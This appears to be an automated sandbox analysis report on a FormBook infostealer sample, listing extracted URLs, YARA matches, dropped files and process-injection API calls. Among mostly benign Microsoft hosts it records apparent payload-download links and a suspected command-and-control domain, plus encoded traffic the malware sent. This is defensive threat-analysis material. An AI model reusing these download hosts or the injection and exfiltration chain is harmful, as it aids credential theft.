79 71 43 4c 47 57 6e 2d 36 70 6f 75 52 58 45 74 79 4c 54 48 52 64 6c 6f 37 7a 52 66 31 31 4d 39 59 49 44 51 6d 35 61 69 41 72 50 48 38 44 6f 34 44 79 70 59 71 4f 7e 74 35 74 61 2d 28 35 4e 6f 45 54 65 54 36 79 6f 43 79 2d 58 79 36 76 78 6d 45 66 64 4e 41 77 4d 78 34 39 78 5f 31 35 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: pvj01lRX=ncZmaR6GSsQXrKqgJIxXha18JcLQZoAOaDWlZMRclYZSho9PonBU5uDSsuLN89UkUzRlidjxwJ7Dj3lRHQ3-1ZF2OFlgDFEwAA4Lh-i-XoaxP9zh6bJUFSQBhPvC2-ikIVW_LwxiGr(C3hTiace_rOefnMki5qqVdRT4r1ndVT64eCoqQupN8UTtrToyfbpKASdE2Ai3jJCRpBXXgty0xHec~ZA1C1prZ4OVuMtdy5ldR8aVAWBySmcOWDfQ9x0877ElmHDxlC2j(PyaYXycCb(_LCRhfUXaHyz4gz(EiRkPIto2EUyqCLGWn-6pouRXEtyLTHRdlo7zRf11M9YIDQm5aiArPH8Do4DypYqO~t5ta-(5NoETeT6yoCy-Xy6vxmEfdNAwMx49x_154Q).
      Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: PowerShell_transcript.128757.J4I_YvVX.20200827024953.txt.1.drString found in binary or memory: http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 0000000B.00000002.493461114.00000000058A7000.00000040.00000001.sdmp, svchost.exe, 00000010.00000002.482793213.0000000003BA9000.00000004.00000001.sdmpString found in binary or memory: http://www.getscholardollars.com
      Source: explorer.exe, 0000000B.00000002.493461114.00000000058A7000.00000040.00000001.sdmp, svchost.exe, 00000010.00000002.482793213.0000000003BA9000.00000004.00000001.sdmpString found in binary or memory: http://www.getscholardollars.com/d2w/
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: svchost.exe, 00000006.00000002.321462056.0000000000A76000.00000004.00000001.sdmpString found in binary or memory: https://6lyy0a.am.files.1drv.com/
      Source: svchost.exe, 00000006.00000002.321291081.0000000000A49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.321373361.0000000000A61000.00000004.00000001.sdmpString found in binary or memory: https://6lyy0a.am.files.1drv.com/y4m9LWIwBSOQZ002FnO9AlFZI4TaGiuL9HMMApb3heBdjyHRxs5mpHgknPTr_7Tg3GK
      Source: svchost.exe, 00000006.00000002.321373361.0000000000A61000.00000004.00000001.sdmpString found in binary or memory: https://6lyy0a.am.files.1drv.com/y4mrpAmFXuLrMlicrs_2MxPy0LaI4-OoewYBlymu_OvxOlZgP-5lXyjsNgp7IbARiEI
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.aadrm.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.onedrive.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://augloop.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.entity.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cortana.ai
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cr.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://directory.services.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.windows.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.windows.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.microsoftonline.com/common
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows.local
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://management.azure.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://management.azure.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://messaging.office.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officeapps.live.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://onedrive.live.com
      Source: svchost.exe, 00000006.00000002.321211456.0000000000A12000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: svchost.exe, 00000006.00000002.321175230.0000000000A00000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21125&authkey=AI1EUE6
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://settings.outlook.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://tasks.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: svchost.exe, 00000004.00000002.253669190.0000000000800000.00000004.00000001.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\O38QPC87\O38logri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\O38QPC87\O38logrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.482604625.0000000003A2F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Powershell drops PE fileShow sources
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F9854 NtProtectVirtualMemory,4_2_023F9854
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F3690 NtWriteVirtualMemory,4_2_023F3690
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F3E8B NtWriteVirtualMemory,4_2_023F3E8B
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F376C NtWriteVirtualMemory,4_2_023F376C
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F0762 NtSetInformationThread,TerminateProcess,4_2_023F0762
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F075D NtSetInformationThread,TerminateProcess,4_2_023F075D
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F3BDC NtWriteVirtualMemory,4_2_023F3BDC
